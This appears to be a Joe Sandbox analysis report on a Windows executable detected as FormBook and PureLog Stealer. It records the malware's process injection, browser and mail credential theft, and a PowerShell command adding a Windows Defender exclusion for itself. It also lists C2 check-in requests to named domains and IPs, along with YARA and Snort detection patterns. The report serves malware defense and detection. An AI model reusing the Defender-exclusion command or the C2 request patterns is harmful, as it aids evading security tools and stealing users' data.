Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Doc 1Z881A080453968203.exe

Overview

General Information

Sample name:Doc 1Z881A080453968203.exe
Analysis ID:1436308
MD5:51812b068c74b61db320570d6d13ee07
SHA1:b7ab99a410a35b08a97edab12cc460863fd9d300
SHA256:62ce98f7fcd773efa3deac85904b54c17b456af92b6e778c2adfc998bd07f5c3
Tags:exe
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Doc 1Z881A080453968203.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: 51812B068C74B61DB320570D6D13EE07)
    • powershell.exe (PID: 7596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Doc 1Z881A080453968203.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: 51812B068C74B61DB320570D6D13EE07)
    • Doc 1Z881A080453968203.exe (PID: 7628 cmdline: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: 51812B068C74B61DB320570D6D13EE07)
    • Doc 1Z881A080453968203.exe (PID: 7636 cmdline: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: 51812B068C74B61DB320570D6D13EE07)
    • Doc 1Z881A080453968203.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe" MD5: 51812B068C74B61DB320570D6D13EE07)
      • ShWVPkMdEfalHck.exe (PID: 1448 cmdline: "C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cttune.exe (PID: 7380 cmdline: "C:\Windows\SysWOW64\cttune.exe" MD5: E515AF722F75E1A5708B532FAA483333)
          • ShWVPkMdEfalHck.exe (PID: 4540 cmdline: "C:\Program Files (x86)\xIOtVlNOKTJJgUmrxRSjaUaTfeifqxOizQOAJxzktpgFM\ShWVPkMdEfalHck.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3568 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x32220:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x1b85f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a450:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13a8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.Doc 1Z881A080453968203.exe.2ed747c.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2da33:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17072:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            0.2.Doc 1Z881A080453968203.exe.2ec6804.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              7.2.Doc 1Z881A080453968203.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                Click to see the 9 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ParentImage: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe, ParentProcessId: 7492, ParentProcessName: Doc 1Z881A080453968203.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ProcessId: 7596, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ParentImage: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe, ParentProcessId: 7492, ParentProcessName: Doc 1Z881A080453968203.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ProcessId: 7596, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ParentImage: C:\Users\user\Desktop\Doc 1Z881A080453968203.exe, ParentProcessId: 7492, ParentProcessName: Doc 1Z881A080453968203.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Doc 1Z881A080453968203.exe", ProcessId: 7596, ProcessName: powershell.exe

                Snort Signatures

                Timestamp:05/04/24-10:10:16.842546
                SID:2855465
                Source Port:49709
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/24-10:10:33.998564
                SID:2855464
                Source Port:49710
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/24-10:10:55.056211
                SID:2855464
                Source Port:49715
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/24-10:10:45.265920
                SID:2855465
                Source Port:49713
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/24-10:10:52.210291
                SID:2855464
                Source Port:49714
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/04/24-10:10:38.910872
                SID:2855464
                Source Port:49711
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Doc 1Z881A080453968203.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://www.coppercookwarekitchen.comAvira URL Cloud: Label: malware
                Source: http://www.coppercookwarekitchen.com/gtit/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: Doc 1Z881A080453968203.exeReversingLabs: Detection: 63%
                Source: Doc 1Z881A080453968203.exeVirustotal: Detection: 65%Perma Link
                Yara detected FormBook
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.Doc 1Z881A080453968203.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000F.00000002.2600975698.0000000000F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038647178.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2037292581.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601515677.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2601810779.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.2599613488.0000000002F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.2038799247.00000000025F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.2601294723.0000000002DC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Machine Learning detection for sample
                Source: Doc 1Z881A080453968203.exeJoe Sandbox ML: detected
                Source: Doc 1Z881A080453968203.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Doc 1Z881A080453968203.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cttune.pdb source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037453632.0000000001138000.00000004.00000020.00020000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2600415684.000000000077E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037453632.0000000001138000.00000004.00000020.00020000.00000000.sdmp, ShWVPkMdEfalHck.exe, 0000000D.00000002.2600415684.000000000077E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ShWVPkMdEfalHck.exe, 0000000D.00000000.1945831392.0000000000C0E000.00000002.00000001.01000000.00000009.sdmp, ShWVPkMdEfalHck.exe, 0000000F.00000002.2599935900.0000000000C0E000.00000002.00000001.01000000.00000009.sdmp
                Source: Binary string: wntdll.pdbUGP source: Doc 1Z881A080453968203.exe, 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2040039193.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2037858373.0000000004BD7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Doc 1Z881A080453968203.exe, Doc 1Z881A080453968203.exe, 00000007.00000002.2037717484.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, cttune.exe, 0000000E.00000003.2040039193.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000003.2037858373.0000000004BD7000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.00000000050DE000.00000040.00001000.00020000.00000000.sdmp, cttune.exe, 0000000E.00000002.2602332777.0000000004F40000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 14_2_02F1B7A0 FindFirstFileW,FindNextFileW,FindClose,14_2_02F1B7A0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 4x nop then xor eax, eax14_2_02F09480
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 4x nop then pop edi14_2_02F11D10

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49709 -> 91.195.240.123:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:49710 -> 87.107.55.55:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:49711 -> 87.107.55.55:80
                Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:49713 -> 87.107.55.55:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:49714 -> 35.215.179.87:80
                Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:49715 -> 35.215.179.87:80
                Source: Joe Sandbox ViewIP Address: 91.195.240.123 91.195.240.123
                Source: Joe Sandbox ViewIP Address: 91.195.240.123 91.195.240.123
                Source: Joe Sandbox ViewASN Name: SINET-ASAccessServiceProviderIR SINET-ASAccessServiceProviderIR
                Source: Joe Sandbox ViewASN Name: GOOGLE-2US GOOGLE-2US
                Source: Joe Sandbox ViewASN Name: SEDO-ASDE SEDO-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /gtit/?h2hLp=lXUTv2j8Xvb&6t=7JoAjWU6fcQ7CNTtX/U31Su9rRPUkr/mRT6nto1Tw/3EsD0jLMtc/bvrMEH2PX3CJD1RySmx+2JNj33ZBcO0uuHomTTQmPBBQgDcEfgCf/hj3/XBz9l0dPBO2TTZTjDWug== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.ty8yd.usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Source: global trafficHTTP traffic detected: GET /gtit/?6t=MgfHm/AWJcZtJWhW2C0E/J+QQ7KNY47B4fJU/YR8UcoonAYwvhq6NXdlvEESKTg86057McGoCNEDbpDsB8WVIewJXmm9gpc24T96Iv1w6gUl0XtnH9Aw4uL+4GJqM1s/fA==&h2hLp=lXUTv2j8Xvb HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tehranrizcomputer.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.ty8yd.us
                Source: global trafficDNS traffic detected: DNS query: www.tehranrizcomputer.com
                Source: global trafficDNS traffic detected: DNS query: www.coppercookwarekitchen.com
                Source: unknownHTTP traffic detected: POST /gtit/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-USHost: www.tehranrizcomputer.comOrigin: http://www.tehranrizcomputer.comContent-Length: 203Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.tehranrizcomputer.com/gtit/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 36 74 3d 42 69 33 6e 6c 4b 68 72 50 71 38 73 4c 46 31 65 2f 53 6f 77 2b 59 33 74 41 4d 37 79 45 35 72 71 73 70 5a 49 70 35 31 4c 41 59 31 51 7a 31 6b 6d 6f 69 69 56 46 55 73 42 68 6b 30 56 43 51 41 6d 34 56 52 43 44 73 61 73 4e 2b 45 66 63 70 61 55 66 35 6d 68 54 2f 63 75 50 51 44 78 6d 36 45 45 2b 54 46 48 58 4e 68 53 34 6b 45 6e 73 47 4a 59 50 34 51 45 70 4e 66 79 2f 56 59 64 4c 6c 6c 77 64 56 6a 2f 62 64 30 4d 75 67 76 36 73 6e 48 69 50 30 66 59 47 66 75 37 6b 72 71 4c 52 44 62 52 6a 67 38 63 72 41 2f 52 73 53 41 44 57 62 6e 31 33 63 54 74 6f 56 56 52 63 32 62 37 6e 33 4d 33 59 47 5a 58 35 62 63 3d Data Ascii: 6t=Bi3nlKhrPq8sLF1e/Sow+Y3tAM7yE5rqspZIp51LAY1Qz1kmoiiVFUsBhk0VCQAm4VRCDsasN+EfcpaUf5mhT/cuPQDxm6EE+TFHXNhS4kEnsGJYP4QEpNfy/VYdLllwdVj/bd0Mugv6snHiP0fYGfu7krqLRDbRjg8crA/RsSADWbn13cTtoVVRc2b7n3M3YGZX5bc=
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddencontent-length: 93cache-control: no-cachecontent-type: text/htmlconnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3ec_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Sat, 04 May 2024 08:10:35 GMTData Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 66 dd 1c ff 4d 40 c4 ba 04 69 f8 63 a4 6f 7e bb d3 9d de 70 20 22 3c 51 2f f9 cb a1 51 ef e7 e8 b8 1a 41 10 09 a1 be 1c 59 7f f7 6b d9 55 06 41 d4 bc c5 3c 86 5a 1d b7 c6 7f 4e 05 11 50 31 9a d1 c4 a7 12 f0 88 b3 c9 93 da b7 0d 1c 53 69 bf f5 8d bc d7 56 92 be 7c b3 b7 83 ed 73 f1 91 65 2d ad 43 bf 26 63 c0 9b 65 63 3a d9 e2 9a 28 4d 82 b0 c5 a3 a9 b7 ad 59 98 31 83 01 df b7 a3 ae 94 0d ae 05 e3 33 4d b0 66 d7 06 87 36 58 a3 2c 1a 5c 77 86 e0 e7 ae d1 dd 0d 58 6c d6 a4 b7 a6 d2 0d f6 ed be 91 9b b6 df 30 63 37 e1 ae ea 42 21 e0 36 a7 bb 4d 21 cb 9b e9 33 f3 58 5b d9 59 fd b1 34 6d 3f 78 b4 97 06 e0 f5 ec da c6 f6 25 eb eb 9e 9c 4d 26 41 10 3c 71 63 f9 b7 9d 9d 55 fd f6 bf bd 78 d9 f5 83 ff 2d fa da a8 41 f2 df df ce c3 97 5f 82 32 e5 d0 62 e7 d9 1f e7 fe d6 28 5c 78 ec 68 b5 c7 e3 23 9c 29 e0 f8 df 8f 9d be b1 a7 42 e5 ac f3 27 87 d1 18 d5 4a eb c3 6b 17 36 ba 70 a1 46 21 9e 0d ce 9b f6 b5 35 3d 5a af d1 ed 29 dd 73 19 f2 df 76 b4 67 c9 ac 49 90 80 8f 38 b2 a6 30 de 1d bd 2e 3b ea cc 05 08 28 cf c0 6b de d8 23 08 cf 26 93 c0 c5 80 3c 91 c8 3b ec b4 47 d0 0e 4c ef 75 ab 3f a2 82 51 fb fa 1c 2a b7 f9 a3 91 ce c3 c5 8b ef c1 f1 de 47 09 db 28 62 1c 28 d4 de f7 2e 0b c3 bd 91 ce c7 ef 78 63 55 6f d1 b9 30 f8 76 2e 74 68 42 a0 f4 6c 62 41 d8 ad e4 eb 7b f8 09 1e fe ed 97 4f f7 ff f7 fe 33 3c fc d7 fb bf b9 ff bf 40 c1 51 c5 1f 53 3f df ff cd 9f ff ef fd e7 87 9f e0 fe 7f 3c fc 74 ff 97 f7 9f 1f fe 2b dc ff e5 2f 9f ee ff 0a fe fc df ef 3f 3f fc 97 87 7f fb e5 d3 c3 cf f7 ff e3 fe 2f 7d e0 b1 f2 da f9 71 c3 c6 94 b2 41 0d 7e 09
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 3ec_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://tehranrizcomputer.com/wp-json/>; rel="https://api.w.org/"x-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Sat, 04 May 2024 08:10:40 GMTData Raw: 35 65 64 63 0d 0a f4 ff 1b 66 23 ec 9e 95 da 7b a8 ca 80 39 69 f5 00 a8 ce c4 18 37 f4 c7 af 3f ff fe 2a 30 76 37 c4 3a ae e7 fb 7f b3 d4 fe d7 ac 73 bc d8 df 40 47 91 4a 2e 80 00 87 1a 28 97 12 79 48 e2 1e 1c b7 65 b7 bb db d2 e1 01 89 cb 22 24 92 60 00 b0 58 65 45 ef ff 39 59 78 b3 f7 1f a6 37 8d 9b b5 d4 d9 fd cb a6 d5 7b e7 f3 52 d9 1b ec da 96 a7 bb 91 84 60 76 ef ce 89 cb e1 47 90 19 86 20 0e e1 74 e1 af 74 d6 9f f1 e5 f4 d4 53 5e 26 35 52 4b 02 24 0f 68 e2 6e b6 bd 29 53 8d d4 80 66 94 be 24 8c bd 21 92 0e aa fb 3f 47 8d 99 a0 8f d9 10 7d 39 bf 06 b3 8f e5 e7 e9 aa 9a dd b0 dd 51 4b 1c a0 97 f0 ec 35 e8 aa f9 34 4b 64 87 fe 7f df b4 72 57 52 34 cd ee 96 37 b9 0f 6d da 4d 37 8e 23 e7 22 29 74 36 ba e6 05 ff 57 55 50 85 42 50 05 30 28 98 a0 40 30 a8 22 70 8e 40 a2 ef bb ef fd 5f bf 7e 15 d0 f0 03 82 a6 c1 b6 00 bb 77 17 04 c9 11 db 07 60 83 01 c7 d8 a6 bc 0b 75 72 92 e3 7b 64 38 32 ce 04 99 fb c0 3a b6 9c e5 66 0a 67 33 39 17 84 9b 06 32 2e 94 42 2d 63 66 d3 7e ff ae dd 4a 06 21 84 a1 12 f5 31 66 dd 1c ff 4d 40 c4 ba 04 69 f8 63 a4 6f 7e bb d3 9d de 70 20 22 3c 51 2f f9 cb a1 51 ef e7 e8 b8 1a 41 10 09 a1 be 1c 59 7f f7 6b d9 55 06 41 d4 bc c5 3c 86 5a 1d b7 c6 7f 4e 05 11 50 31 9a d1 c4 a7 12 f0 88 b3 c9 93 da b7 0d 1c 53 69 bf f5 8d bc d7 56 92 be 7c b3 b7 83 ed 73 f1 91 65 2d ad 43 bf 26 63 c0 9b 65 63 3a d9 e2 9a 28 4d 82 b0 c5 a3 a9 b7 ad 59 98 31 83 01 df b7 a3 ae 94 0d ae 05 e3 33 4d b0 66 d7 06 87 36 58 a3 2c 1a 5c 77 86 e0 e7 ae d1 dd 0d 58 6c d6 a4 b7 a6 d2 0d f6 ed be 91 9b b6 df 30 63 37 e1 ae ea 42 21 e0 36 a7 bb 4d 21 cb 9b e9 33 f3 58 5b d9 59 fd b1 34 6d 3f 78 b4 97 06 e0 f5 ec da c6 f6 25 eb eb 9e 9c 4d 26 41 10 3c 71 63 f9 b7 9d 9d 55 fd f6 bf bd 78 d9 f5 83 ff 2d fa da a8 41 f2 df df ce c3 97 5f 82 32 e5 d0 62 e7 d9 1f e7 fe d6 28 5c 78 ec 68 b5 c7 e3 23 9c 29 